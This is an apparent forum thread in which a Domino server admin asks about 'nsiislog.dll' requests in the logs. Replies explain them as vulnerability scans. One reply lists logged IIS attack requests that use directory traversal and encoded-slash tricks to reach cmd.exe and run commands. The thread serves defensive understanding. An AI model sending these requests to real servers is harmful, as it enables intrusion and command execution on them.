What thsi command do in Http ? " GET/scripts/nsiislog.dll "

In my Domino server Log, I see a strange command :

GET/scripts/nsiislog.dll sevarl time ? what does it means ? What could be the action put by the user if I have this log in my database ?

I want to say if there are a link to explain this command …

Thanks us …

Subject: What thsi command do in Http ? " GET/scripts/nsiislog.dll "

Just hackers scanning your server for known weaknesses …I getting the all the time, for years now … like these below:

But as Michael mentioned : you’re running Domino, so breathe easy : it won’t do any harm!

Request

GET /scripts/root.exe?/c+dir HTTP/1.0

GET /MSADC/root.exe?/c+dir HTTP/1.0

GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0

GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0

GET /scripts/…%255c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0

GET /_vti_bin/…%255c…/…%255c…/…%255c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0

GET /_mem_bin/…%255c…/…%255c…/…%255c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0

GET /msadc/…%255c…/…%255c…/…%255c/…%c1%1c…/…%c1%1c…/…%c1%1c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0

GET /scripts/…%c1%1c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0

GET /scripts/…%c0%2f…/winnt/system32/cmd.exe?/c+dir HTTP/1.0

GET /scripts/…%c0%af…/winnt/system32/cmd.exe?/c+dir HTTP/1.0

GET /scripts/…%c1%9c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0

GET /scripts/…%%35%63…/winnt/system32/cmd.exe?/c+dir HTTP/1.0

GET /scripts/…%%35c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0

GET /scripts/…%25%35%63…/winnt/system32/cmd.exe?/c+dir HTTP/1.0

GET /scripts/…%252f…/winnt/system32/cmd.exe?/c+dir HTTP/1.0

Subject: RE: What thsi command do in Http ? " GET/scripts/nsiislog.dll "

Thanks you …

Do you know a site where I can test my server to prevent hackers …ow

Subject: RE: What thsi command do in Http ? " GET/scripts/nsiislog.dll "

try http://scan.sygate.com

if you search the web with words like security, scan, ports, you’ll find a lots of port scanners

Subject: What thsi command do in Http ? " GET/scripts/nsiislog.dll "

sounds like a hacker tried to hack your server…

If your server is on the web, not surprising, some spend their time scanning ports and trie know vulnerabilities (such as running a script on the remote server).

Fortunatly, you run Domino…much much more secure webserver than the IIS around… :slight_smile: